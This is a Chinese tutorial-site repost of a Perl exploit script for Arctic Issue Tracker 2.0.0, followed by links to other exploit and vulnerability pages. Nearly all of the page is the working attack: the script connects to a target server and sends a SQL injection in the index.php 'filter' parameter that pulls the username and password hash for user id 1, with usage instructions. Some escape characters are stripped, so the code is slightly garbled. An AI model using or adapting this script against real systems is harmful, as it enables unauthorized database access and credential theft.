手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
摘要:#!/usr/bin/perluseIO::Socket;printq{----------------------------------...

#!/usr/bin/perluse IO::Socket;

print q{

-----------------------------------------------

Arctic Issue Tracker v2.0.0 exploit by ldma

~ SubCode ~

use: arctic.pl [server] [dir]

sample:

$perl arctic.pl localhost /arctic/

-----------------------------------------------};$webpage = $ARGV[0];

$directory = $ARGV[1];

print " -initiatingn";

print "|--modules..OK!n";

sleep 1;

print "|--premodules..OK!n";

sleep 1;

print "|--preprocessors..OK!n";

sleep 1;

print " -opening channel.. OK!n";

sleep 2;

print "--------------------------------------------n";

print "~ configuration complete.. OK!n";

print "~ scanning";

$|=1;

foreach (1..2) {

print ".";

sleep 1;

}

print " OK!n";

if (!$webpage) { die " rtfm geekn"; }$wbb_dir =

"".$webpage.$directory."index.php?filter=-1 union select 1,2,3,concat(username,0x3a,password),5 from arctic_user where id=1--";print "~ connecting";

$|=1;

foreach (1..1) {

print ".";

sleep 1;

}

print " OK!n";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[ ] Can't connect to Servern";print "~ open exploiting-tree";

$|=1;

foreach (1..2) {

print ".";

sleep 1;

}

print " OK!n";

print $sock "GET $wbb_dir HTTP/1.1n";

print $sock "Accept: */*n";

print $sock "User-Agent: Hackern";

print $sock "Host: $webpagen";

print $sock "Connection: closenn";

print "[ ] Target: $webpagen";

while ($answer = ) {

if ($answer =~ /Current Filter: (.*)/) {

print "exploiting in progress";

$|=1;

foreach (1..3) {

print "...";

sleep 1;

}

print "OK!n[ ] vuln: OK!nnnwell done, ldma!nn";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";

print "[ ] USER-ID: -1n";

print "[ ] ID-HASH: $1n";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";

exit();

}

}close($sock);# ldma

【Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit】相关文章:

phpDatingClub (website.php page) Local File Inclusion Vulnerability

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)

Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability

WEB应用脆弱性防止策略 常见的16种WEB攻击以及解决方案

电商账户登录安全

CoolPlayer m3u File Local Buffer Overflow Exploit

MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit

DreamNews Manager (id) Remote SQL Injection Vulnerability

Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit

设置Win8开机按F8进入安全模式

精品推荐
分类导航